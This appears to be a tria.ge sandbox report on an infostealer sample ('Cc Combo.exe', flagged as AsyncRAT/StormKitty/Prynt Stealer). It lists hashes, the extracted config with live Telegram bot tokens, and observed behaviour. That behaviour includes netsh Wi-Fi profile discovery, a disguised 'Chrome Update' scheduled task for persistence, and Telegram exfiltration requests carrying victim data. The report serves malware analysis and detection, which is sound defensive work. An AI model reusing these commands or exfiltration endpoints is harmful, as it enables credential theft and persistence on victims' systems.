Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
10Cc Combo.exe
windows7-x64
10Cc Combo.exe
windows10-2004-x64
10CefSharp.exe
windows7-x64
7CefSharp.exe
windows10-2004-x64
7hitter.exe
windows7-x64
7hitter.exe
windows10-2004-x64
7ldap60.exe
windows7-x64
1ldap60.exe
windows10-2004-x64
3ucrtbase.exe
windows7-x64
3ucrtbase.exe
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
12/09/2024, 19:36 UTC
Behavioral task
behavioral1
Sample
Cc Combo.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Cc Combo.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
CefSharp.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
CefSharp.exe
Resource
win10v2004-20240910-en
Behavioral task
behavioral5
Sample
hitter.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
hitter.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
ldap60.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
ldap60.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
ucrtbase.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
ucrtbase.exe
Resource
win10v2004-20240802-en
General
-
Target
Cc Combo.exe
-
Size
232KB
-
MD5
e074dece1afd2a20f7e479a8319a7857
-
SHA1
9f8ae4d5373955498cb15d1b75f190e105f23186
-
SHA256
cdcfe612d9253b3104b432ff622a9f7a4271059eb3ded0b2f056be9d9950d78f
-
SHA512
5f232ed6f0dc29d913571614b39e353ea08941dde9ec07ca7925a5de17b97b1526e4f548421f703677a3b19babb4bc00310966e31f2a0bad02ff4bfa97b2a2a0
-
SSDEEP
6144:DDubaBBOBIIj6HLLYLCYJqvc1DegW1Db/Q/HbMhQLYiUJiz1o/65:GbaVgibWJLYxJem/6
Malware Config
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/5368-1-0x0000000000520000-0x0000000000560000-memory.dmp family_stormkitty -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation Cc Combo.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Cc Combo.exe File opened for modification C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Cc Combo.exe File created C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini Cc Combo.exe File opened for modification C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini Cc Combo.exe File created C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini Cc Combo.exe File created C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini Cc Combo.exe File created C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini Cc Combo.exe File created C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini Cc Combo.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cc Combo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2400 cmd.exe 5664 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Cc Combo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Cc Combo.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4028 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe 5368 Cc Combo.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5368 Cc Combo.exe Token: SeDebugPrivilege 5368 Cc Combo.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 5368 wrote to memory of 2400 5368 Cc Combo.exe 101 PID 5368 wrote to memory of 2400 5368 Cc Combo.exe 101 PID 5368 wrote to memory of 2400 5368 Cc Combo.exe 101 PID 2400 wrote to memory of 4944 2400 cmd.exe 103 PID 2400 wrote to memory of 4944 2400 cmd.exe 103 PID 2400 wrote to memory of 4944 2400 cmd.exe 103 PID 2400 wrote to memory of 5664 2400 cmd.exe 104 PID 2400 wrote to memory of 5664 2400 cmd.exe 104 PID 2400 wrote to memory of 5664 2400 cmd.exe 104 PID 2400 wrote to memory of 1160 2400 cmd.exe 105 PID 2400 wrote to memory of 1160 2400 cmd.exe 105 PID 2400 wrote to memory of 1160 2400 cmd.exe 105 PID 5368 wrote to memory of 4476 5368 Cc Combo.exe 106 PID 5368 wrote to memory of 4476 5368 Cc Combo.exe 106 PID 5368 wrote to memory of 4476 5368 Cc Combo.exe 106 PID 4476 wrote to memory of 3312 4476 cmd.exe 108 PID 4476 wrote to memory of 3312 4476 cmd.exe 108 PID 4476 wrote to memory of 3312 4476 cmd.exe 108 PID 4476 wrote to memory of 5188 4476 cmd.exe 109 PID 4476 wrote to memory of 5188 4476 cmd.exe 109 PID 4476 wrote to memory of 5188 4476 cmd.exe 109 PID 5368 wrote to memory of 4028 5368 Cc Combo.exe 110 PID 5368 wrote to memory of 4028 5368 Cc Combo.exe 110 PID 5368 wrote to memory of 4028 5368 Cc Combo.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cc Combo.exe"C:\Users\Admin\AppData\Local\Temp\Cc Combo.exe"1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5368 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
- System Location Discovery: System Language Discovery
PID:4944
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5664
-
-
C:\Windows\SysWOW64\findstr.exefindstr All3⤵
- System Location Discovery: System Language Discovery
PID:1160
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
- System Location Discovery: System Language Discovery
PID:3312
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5188
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Local\Temp\Cc Combo.exe"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4380,i,2904906934812054273,11716976550456127484,262144 --variations-seed-version --mojo-platform-channel-handle=1288 /prefetch:81⤵PID:4048
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request154.239.44.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.181.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesticanhazip.comIN AResponseicanhazip.comIN A104.16.185.241icanhazip.comIN A104.16.184.241
-
Remote address:104.16.185.241:80RequestGET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=u4emK4pxfaj8ic1tMTGl8IJEK8DILehYxZgsNGsirHY-1726169839-1.0.1.1-kZgQSYR7Prdol_gnCXifIxHHNkMENBxdaKnlEPDtQFjW1OxRfSMFByxOYvLdngz2XunXYuapspbYDDvBNixPMw; path=/; expires=Thu, 12-Sep-24 20:07:19 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8c2259f60fe83dca-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestapi.mylnikov.orgIN AResponseapi.mylnikov.orgIN A172.67.196.114api.mylnikov.orgIN A104.21.44.66
-
Remote address:172.67.196.114:443RequestGET /geolocation/wifi?v=1.1&bssid=02:79:a9:8c:1e:b7 HTTP/1.1
Host: api.mylnikov.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: MISS
Last-Modified: Thu, 12 Sep 2024 19:37:19 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CBMCkgPVjrxa0hp4jgbwzOiDkB%2Bmgmru2qgBEhRShFn5F2vwpV3%2BSMAMUHbwpghi9CM%2Bj8ZejZFHQdhzDiQZ%2F4jsACiWVBoF2%2B3UmR%2BmX5d8mtWXO%2Fvcqj4vmZwyF1LzWCTq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8c2259f82dfebd8e-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request241.185.16.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
GEThttps://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket&parse_mode=Markdown&disable_web_page_preview=TrueCc Combo.exeRemote address:149.154.167.220:443RequestGET /bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 12 Sep 2024 19:37:21 GMT
Content-Type: application/json
Content-Length: 1981
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
GEThttps://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarketCc Combo.exeRemote address:149.154.167.220:443RequestGET /bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket HTTP/1.1
Host: api.telegram.org
ResponseHTTP/1.1 200 OK
Date: Thu, 12 Sep 2024 19:37:21 GMT
Content-Type: application/json
Content-Length: 1597
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
Remote address:8.8.8.8:53Request114.196.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request220.167.154.149.in-addr.arpaIN PTRResponse
-
POSThttps://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendDocument?chat_id=7389740990Cc Combo.exeRemote address:149.154.167.220:443RequestPOST /bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendDocument?chat_id=7389740990 HTTP/1.1
Content-Type: multipart/form-data; boundary="49799353-c840-43a1-9f54-c69126efbf7e"
Host: api.telegram.org
Content-Length: 82937
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Date: Thu, 12 Sep 2024 19:37:21 GMT
Content-Type: application/json
Content-Length: 521
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
POSThttps://api.telegram.org/bot1784055443:AAG-bXLYtnFpjJ_L3ogxA3bq6Mx09cqh8ug/sendDocument?chat_id=1937717367Cc Combo.exeRemote address:149.154.167.220:443RequestPOST /bot1784055443:AAG-bXLYtnFpjJ_L3ogxA3bq6Mx09cqh8ug/sendDocument?chat_id=1937717367 HTTP/1.1
Content-Type: multipart/form-data; boundary="835ea170-e024-49e0-8de3-c6a558444bf4"
Host: api.telegram.org
Content-Length: 82937
Expect: 100-continue
ResponseHTTP/1.1 401 Unauthorized
Date: Thu, 12 Sep 2024 19:37:22 GMT
Content-Type: application/json
Content-Length: 58
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
Remote address:8.8.8.8:53Requestgoogle.comIN AResponsegoogle.comIN A172.217.169.14
-
Remote address:8.8.8.8:53Request26.165.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request107.12.20.2.in-addr.arpaIN PTRResponse107.12.20.2.in-addr.arpaIN PTRa2-20-12-107deploystaticakamaitechnologiescom
-
339 B 708 B 6 4
HTTP Request
GET http://icanhazip.com/HTTP Response
200 -
172.67.196.114:443https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=02:79:a9:8c:1e:b7tls, httpCc Combo.exe814 B 4.3kB 9 9
HTTP Request
GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=02:79:a9:8c:1e:b7HTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0